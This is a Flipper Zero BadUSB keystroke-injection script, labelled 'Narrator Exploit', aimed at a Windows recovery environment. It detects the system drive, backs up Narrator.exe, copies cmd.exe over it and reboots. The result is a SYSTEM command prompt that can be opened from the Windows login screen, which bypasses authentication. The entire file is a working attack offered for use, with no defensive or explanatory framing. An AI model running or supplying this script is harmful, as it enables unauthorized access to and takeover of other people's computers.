REM ================================================================
REM Flipper Zero BadUSB - Narrator Exploit (Working Offline Version)
REM ================================================================
REM author : b1g_ph4rm4                  |
REM _____________________________________|
REM             ,        ,               |
REM            /(        )`              |
REM            \ \___   / |              |
REM            /- _  `-/  '              |
REM           (/\/ \ \   /\              |
REM           / /   | `                  |
REM           O O   ) /    |             |
REM           `-^--'`<     '             |
REM          (_.)  _  )   /              |
REM           `.___/`    /               |
REM             `-----' /                |
REM <----.     __ / __   \               |
REM <----|====O)))==) \) /====           |
REM <----'    `--' `.__,' \              |
REM             |        |               |
REM              \       /               |
REM        ______( (_  / \______         |
REM      ,'  ,-----'   |        \        |
REM      `--{__________)        \/       |
REM _____________________________________|

DELAY 2000

REM Clear screen
STRING cls
ENTER
DELAY 300

REM ================================================================
REM PHASE 1: DETECT SYSTEM DRIVE (Direct commands)
REM ================================================================

STRING echo [*] Detecting Windows system drive...
ENTER
DELAY 500

REM Test drive C
STRING if exist C:\Windows\System32\cmd.exe set SYSDRIVE=C
ENTER
DELAY 300

REM Test drive D (most common in Recovery)
STRING if exist D:\Windows\System32\cmd.exe set SYSDRIVE=D
ENTER
DELAY 300

REM Test drive E
STRING if exist E:\Windows\System32\cmd.exe set SYSDRIVE=E
ENTER
DELAY 300

REM Test drive F
STRING if exist F:\Windows\System32\cmd.exe set SYSDRIVE=F
ENTER
DELAY 300

REM Display found drive
STRING echo.
ENTER
DELAY 300

STRING echo [+] System Drive: %SYSDRIVE%:
ENTER
DELAY 500

STRING echo [+] Windows Path: %SYSDRIVE%:\Windows\System32
ENTER
DELAY 500

STRING echo.
ENTER
DELAY 500

REM ================================================================
REM PHASE 2: VERIFY FILES EXIST
REM ================================================================

STRING echo [*] Verifying Narrator.exe exists...
ENTER
DELAY 300

STRING if not exist %SYSDRIVE%:\Windows\System32\Narrator.exe echo [-] ERROR: Narrator.exe not found!
ENTER
DELAY 500

STRING if not exist %SYSDRIVE%:\Windows\System32\Narrator.exe pause
ENTER
DELAY 300

STRING if not exist %SYSDRIVE%:\Windows\System32\Narrator.exe exit
ENTER
DELAY 500

STRING echo [+] Narrator.exe found
ENTER
DELAY 300

STRING echo.
ENTER
DELAY 500

REM ================================================================
REM PHASE 3: BACKUP NARRATOR.EXE
REM ================================================================

STRING echo [*] Step 1/4: Backing up Narrator.exe...
ENTER
DELAY 500

STRING copy %SYSDRIVE%:\Windows\System32\Narrator.exe %SYSDRIVE%:\Windows\System32\Narrator.bak
ENTER
DELAY 2000

STRING if exist %SYSDRIVE%:\Windows\System32\Narrator.bak (echo [+] Backup successful) else (echo [-] Backup failed & pause & exit)
ENTER
DELAY 1000

STRING echo.
ENTER
DELAY 300

REM ================================================================
REM PHASE 4: REPLACE NARRATOR WITH CMD
REM ================================================================

STRING echo [*] Step 2/4: Replacing Narrator.exe with cmd.exe...
ENTER
DELAY 500

STRING copy /Y %SYSDRIVE%:\Windows\System32\cmd.exe %SYSDRIVE%:\Windows\System32\Narrator.exe
ENTER
DELAY 2000

STRING if %ERRORLEVEL% EQU 0 (echo [+] Replacement successful) else (echo [-] Replacement failed & pause & exit)
ENTER
DELAY 1000

STRING echo.
ENTER
DELAY 300

REM ================================================================
REM PHASE 5: VERIFY REPLACEMENT
REM ================================================================

STRING echo [*] Step 3/4: Verifying replacement...
ENTER
DELAY 500

STRING dir %SYSDRIVE%:\Windows\System32\Narrator.*
ENTER
DELAY 1000

STRING echo.
ENTER
DELAY 300

REM ================================================================
REM PHASE 6: REBOOT SYSTEM
REM ================================================================

STRING echo [*] Rebooting in 5 seconds...
ENTER
DELAY 300

STRING timeout /t 5
ENTER
DELAY 6000

STRING wpeutil reboot
ENTER
